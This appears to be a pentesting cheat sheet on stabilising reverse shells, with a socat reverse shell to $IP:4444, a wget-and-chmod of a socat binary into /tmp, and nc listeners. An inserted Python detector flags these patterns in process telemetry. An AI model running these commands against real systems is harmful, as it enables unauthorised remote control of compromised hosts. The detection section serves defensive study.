Upgrading Shells

A list of methods to upgrade shells to fully interactive TTYs!

Python PTY Upgrade

Run the following command in the limited shell:

python -c 'import pty; pty.spawn("/bin/bash")'

The shell will now look prettier and have some TTY capabilities. For full interactivity, run the following command to enable terminal commands such as clear:

export TERM=xterm

Finally, background the shell with [Ctrl-Z]. Then, from the attack box, run the following commands. The first puts the attack box's terminal in raw mode and turns off its echo, which gives autocompletion and arrow keys. The second brings the shell back to the foreground.

stty raw -echo
fg

If this works, the result is a fully interactive TTY shell. Sometimes it is also useful to adjust the terminal size. Check the values on your attack box and copy them over with the following:

# Attack box - gives row and column length
stty -a
# Shell
stty rows $ROW_LENGTH
stty cols $COL_LENGTH

Socat Upgrade

The following method uses socat to create a second reverse shell that is fully interactive.

On the attack box, create a listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

On the target, launch a reverse shell:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:4444

If socat is missing, a statically built binary can be downloaded with the following commands:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat
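
From the defender's side, the target-side commands in the Python PTY and socat sections leave recognizable process command lines. The following is an added example, not part of the original page: it classifies command lines as they might appear in process-execution telemetry. The rule names, the classify function and the sample lines are constructed for illustration.

```python
import os
import re
import shlex

PYTHON = re.compile(r"^python(\d+(\.\d+)?)?$")
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample command lines (addresses are documentation-range placeholders).
SAMPLE = [
    """python -c 'import pty; pty.spawn("/bin/bash")'""",
    "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4444",
    "python3 manage.py runserver",
    "socat -u /var/log/app.log tcp:192.0.2.20:514",
]


def classify(cmdline):
    """Return the sorted rule names (hypothetical labels) matching one command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        argv = cmdline.split()
    if not argv:
        return []
    hits = set()
    exe = os.path.basename(argv[0])

    # Interpreter invoked with -c only to allocate a PTY around a shell.
    if PYTHON.match(exe) and "-c" in argv[1:-1]:
        code = argv[argv.index("-c") + 1]
        if re.search(r"\bpty\b", code) and "spawn(" in code:
            hits.add("python-pty-spawn")

    # socat exec:/system: address carrying the pty option.
    if exe == "socat":
        for arg in argv[1:]:
            kind, _, rest = arg.partition(":")
            opts = [o.lower() for o in rest.split(",")[1:]]
            if kind.lower() in ("exec", "system") and "pty" in opts:
                hits.add("socat-exec-pty")

    # Binary started from a world-writable directory, as with /tmp/socat.
    if argv[0].startswith(TMP_DIRS):
        hits.add("exec-from-tmp")
    return sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), line)
```

The two benign lines (a Django dev server and a socat log forwarder) produce no hits, which is the false-positive case a rule keyed only on the binary name would get wrong.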

RLWrap Upgrade

The program rlwrap gives access to history, tab autocompletion, and the arrow keys immediately upon receiving a shell. Sometimes, manual stabilization is still needed for interrupts like [Ctrl-C] to work.

rlwrap nc -nvlp $PORT

Often, this can also be set up as an alias that replaces the usual listener command.

alias listener='sudo rlwrap nc -nvlp'
